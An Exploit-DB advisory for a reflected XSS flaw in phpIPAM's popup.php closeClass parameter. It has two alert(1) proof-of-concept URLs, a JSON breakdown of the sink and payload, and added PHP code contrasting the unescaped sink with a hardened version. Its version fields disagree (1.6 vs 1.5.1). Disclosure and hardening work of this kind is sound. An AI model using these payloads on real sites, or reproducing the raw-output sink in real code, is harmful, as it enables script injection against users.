[webapps] phpIPAM 1.6 - Reflected Cross Site Scripting (XSS)
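phpIPAM 1.6 contains a reflected XSS vulnerability: script can be injected through the closeClass parameter of popup.php. An attacker can use a crafted malicious URL to trigger a popup or perform other malicious actions. The vulnerability stems from the closeClass parameter being output directly into an HTML attribute without filtering. 2025-4-11 00:0:0 Author: www.exploit-db.com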

# Exploit Title: [phpIPAM 1.6 Reflected XSS via closeClass Parameter in popup.php]
# Date: [2024-10-26]
# Exploit Author: [CodeSecLab]
# Vendor Homepage: [https://github.com/phpipam/phpipam]
# Software Link: [https://github.com/phpipam/phpipam]
# Version: [1.5.1] 
# Tested on: [Ubuntu Windows]
# CVE : [CVE-2023-24657]
PoC:
1)http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
2)http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22
Details:
{
    "Sink": "print @$_REQUEST['closeClass']",
    "Vulnerable Variable": "closeClass",
    "Source": "$_REQUEST['closeClass']",
    "Sanitization Mechanisms Before Patch": "None",
    "Sink Context Constraints": "Reflected within HTML attributes without escaping",
    "Attack Payload": "\" onclick=\"alert(1)\"",
    "Execution Path Constraints": "Directly accessed from the 'closeClass' parameter without modification",
    "Request URL": "http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22",
    "Request Method": "GET",
    "Final PoC": "http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22"
}


[Replace Your Domain Name]
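
The sink described in Details, shown beside a hardened form. This is an added example, not phpIPAM's code or its patch: the button markup, the function names and the default class `popup-close` are assumptions made for illustration, and only the sink pattern and the payload string come from the advisory.

```php
<?php
// Added illustration: the markup below is constructed and is not phpIPAM's
// popup.php source. Only the sink pattern (a request value printed into an
// HTML attribute) and the payload string are taken from the advisory.

// Vulnerable pattern: request value printed raw into a double-quoted attribute.
function render_close_button_vulnerable(array $request): string
{
    return '<button class="btn ' . @$request['closeClass'] . '">Close</button>';
}

// Hardened pattern: accept only space-separated CSS class tokens, then escape
// for the attribute context as well, so a later change to the allowlist
// cannot reopen the injection.
function render_close_button_hardened(array $request): string
{
    $class = $request['closeClass'] ?? '';
    $tokens = '/\A[A-Za-z0-9_-]+(?: [A-Za-z0-9_-]+)*\z/';
    if (!is_string($class) || !preg_match($tokens, $class)) {
        $class = 'popup-close'; // hypothetical default class name
    }
    $safe = htmlspecialchars($class, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<button class="btn ' . $safe . '">Close</button>';
}

// Constructed inputs: a benign class name, the decoded payload from the
// advisory, and an array (PHP parses closeClass[]=x into an array).
$samples = [
    ['closeClass' => 'hidePopup2'],
    ['closeClass' => '" onclick="alert(1)"'],
    ['closeClass' => ['array', 'input']],
];

foreach ($samples as $request) {
    echo 'input:      ' . json_encode($request['closeClass']) . PHP_EOL;
    if (is_string($request['closeClass'])) {
        // Second sample breaks out of class="..." and adds an onclick attribute.
        echo 'vulnerable: ' . render_close_button_vulnerable($request) . PHP_EOL;
    }
    // Rejected values fall back to the default class; nothing is reflected.
    echo 'hardened:   ' . render_close_button_hardened($request) . PHP_EOL . PHP_EOL;
}
```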
            

Source: https://www.exploit-db.com/exploits/52176